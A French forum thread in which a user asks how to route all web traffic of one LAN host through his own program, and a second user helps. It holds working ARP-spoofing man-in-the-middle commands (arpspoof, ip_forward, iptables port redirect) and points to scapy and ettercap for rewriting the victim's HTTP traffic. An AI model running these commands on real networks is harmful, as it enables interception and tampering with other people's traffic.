Discussion :

[sloshy]

Bonjour,
J'aimerai pouvoir intercepter tous le traffic web (port 80) d'une ip précise (192.168.1.42) et le faire passer par un mon application, qui effectuerai un match sur la requête et qui répond en fonction.

J'effectue donc un simple MITM

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
# arpspoof -i eth0 -t 192.168.1.42 192.168.1.1

Le problème est que lorsque j'écoute le port 8080, il n'y a absolument rien qui passe, pour y arriver, je suis obliger de lancer un transproxy.
Ma question est donc, que fais de particulier transproxy pour avoir droit au mode promiscuous ?
J'ai bien tenté d'ajouter d'autre règle iptables, j'ai cherché mais pas moyen de me passé de transproxy (hors j'aimerai vraiment m'en passer).

merci de votre aide.

[dahtah]

Salut,
Je vois pas pourquoi t'utilises la redirection nat, vu que t'es dans le même sous réseau et que visiblement t'es pas sur le routeur (attaque MITM).
Pour tester, fais ton arpspoofing avant, puis redirige la chaîne INPUT d'iptables vers ou tu veux :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
echo "1" > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.42 192.168.1.1
iptables -A INPUT -i eth0 -s 192.168.1.42 -p tcp --dport 80 -j REDIRECT --to-ports 8080

Pour le packet shaping, regarde du côté de scappy si ça t'intéresse.
Bon courage

[sloshy]

Bonjour,
Merci pour la correction de la règles iptables, (même si celle que j'ai donné fonctionne très bien ^^).
Mon problème vient plutot du fait que les paquets ne me sont pas destiné.
# Echo server program

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import socket
 
HOST = ''                 # Symbolic name meaning all available interfaces
PORT = 8080               # Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
    data = conn.recv(1024)
    if not data: break
    conn.send(data)
conn.close(

)

Ce script ne parvient pas à lire les info qui arrive sur le port 8080.
Même si la mac du paquet correspond bien à ma carte raison, quand on remonte dans les couches, l'ip elle ne correspond pas et je pense que mon problème est là.
J'aimerai activer le mode promiscuité un peu de cette manière:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

, sauf que je connais pas la méthode à suivre pour le faire en python sous linux.

[dahtah]

Salut,
C'est normal que tu ne vois rien rentrer sur ton port 8080 avec le code Python que tu as donné. En fait, avec ton code, tu as un serveur en écoute sur le port 8080. Il attend donc des connexions entrantes, essai de faire un telnet localhost 8080 depuis l'ordi ou ton code tourne, tu verras que ton code fonctionne.
En fait, toi tu veux transformer des packets http dont les connexions sont destinées à d'autres serveurs. Il faut donc que tu sniff le traffic passant par ton MITM, afin de le modifier dynamiquement. Tu ne dois pas attendre une connexion entrante. Pour modifier les packets à la volée regarde du côté de scapy. Il te permet de sniffer le traffic et de modifier les champs d'une requête qui t'intéresse.
Sinon, tu peux faire ça directement avec ettercap, il propose une fonction de shapping http.
Par contre, je t'ai dis une connerie, ta règle iptables est bonne pour faire de la translation de port.
Bon courage...